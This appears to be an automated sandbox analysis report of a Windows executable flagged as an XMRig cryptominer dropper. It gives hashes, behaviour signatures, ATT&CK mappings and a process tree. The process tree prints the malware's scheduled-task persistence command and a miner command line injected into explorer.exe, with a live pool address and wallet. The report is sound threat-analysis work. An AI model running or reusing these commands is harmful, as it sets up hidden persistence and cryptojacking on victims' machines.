Analysis

  • max time kernel
    137s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-07-2021 19:07

General

  • Target

    eb9f90fdaf8f78ff76132098d17fd0bd.exe

  • Size

    45KB

  • MD5

    eb9f90fdaf8f78ff76132098d17fd0bd

  • SHA1

    516bbca9d82ae9e8d35a5120cf16b95d87a8c35a

  • SHA256

    479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204

  • SHA512

    fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eb9f90fdaf8f78ff76132098d17fd0bd.exe
    "C:\Users\Admin\AppData\Local\Temp\eb9f90fdaf8f78ff76132098d17fd0bd.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3860
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:2600
    • C:\Users\Admin\AppData\Local\Temp\Services.exe
      "C:\Users\Admin\AppData\Local\Temp\Services.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2096
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1544
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:8
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos --pass= --cpu-max-threads-hint=50 --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2388

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Execution
    Scheduled Task (T1053) 1
  • Persistence
    Scheduled Task (T1053) 1
  • Privilege Escalation
    Scheduled Task (T1053) 1
  • Discovery
    System Information Discovery (T1082) 1
  • Command and Control
    Web Service (T1102) 1

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Services.exe
    MD5

    eb9f90fdaf8f78ff76132098d17fd0bd

    SHA1

    516bbca9d82ae9e8d35a5120cf16b95d87a8c35a

    SHA256

    479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204

    SHA512

    fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    8a967775b61469d620643ac7b8623551

    SHA1

    07cce4043304be719aab5aafe75e7e966276cf1c

    SHA256

    212de1e16de9cd4030f0617c3c52fba4c18b21856dabd3eb2ded1b3a9eced68e

    SHA512

    10c825361d545a32be723c9b62b99c7aa0bbacf357a1e8d62dff19df2b6671a9ca7e9edef564eba89887a56ba676e272350b7b67ea7a65723cf08820095478f1

  • memory/8-132-0x0000000000370000-0x0000000000371000-memory.dmp
    Filesize

    4KB

  • memory/8-136-0x0000000002A20000-0x0000000002A22000-memory.dmp
    Filesize

    8KB

  • memory/8-129-0x0000000000000000-mapping.dmp
  • memory/1544-134-0x0000000000000000-mapping.dmp
  • memory/1868-114-0x0000000000C70000-0x0000000000C71000-memory.dmp
    Filesize

    4KB

  • memory/1868-120-0x0000000003740000-0x0000000003742000-memory.dmp
    Filesize

    8KB

  • memory/1868-117-0x00000000036F0000-0x00000000036F1000-memory.dmp
    Filesize

    4KB

  • memory/1868-116-0x0000000001590000-0x0000000001599000-memory.dmp
    Filesize

    36KB

  • memory/2096-128-0x0000000000000000-mapping.dmp
  • memory/2388-138-0x00000001402EB66C-mapping.dmp
  • memory/2388-137-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/2388-139-0x0000000000C00000-0x0000000000C20000-memory.dmp
    Filesize

    128KB

  • memory/2388-140-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/2388-143-0x0000000014150000-0x0000000014170000-memory.dmp
    Filesize

    128KB

  • memory/2388-144-0x0000000014600000-0x0000000014620000-memory.dmp
    Filesize

    128KB

  • memory/2388-146-0x0000000014370000-0x0000000014390000-memory.dmp
    Filesize

    128KB

  • memory/2388-145-0x0000000014390000-0x00000000143B0000-memory.dmp
    Filesize

    128KB

  • memory/2600-119-0x0000000000000000-mapping.dmp
  • memory/2704-121-0x0000000000000000-mapping.dmp
  • memory/2704-135-0x000000001CB02000-0x000000001CB03000-memory.dmp
    Filesize

    4KB

  • memory/3860-118-0x0000000000000000-mapping.dmp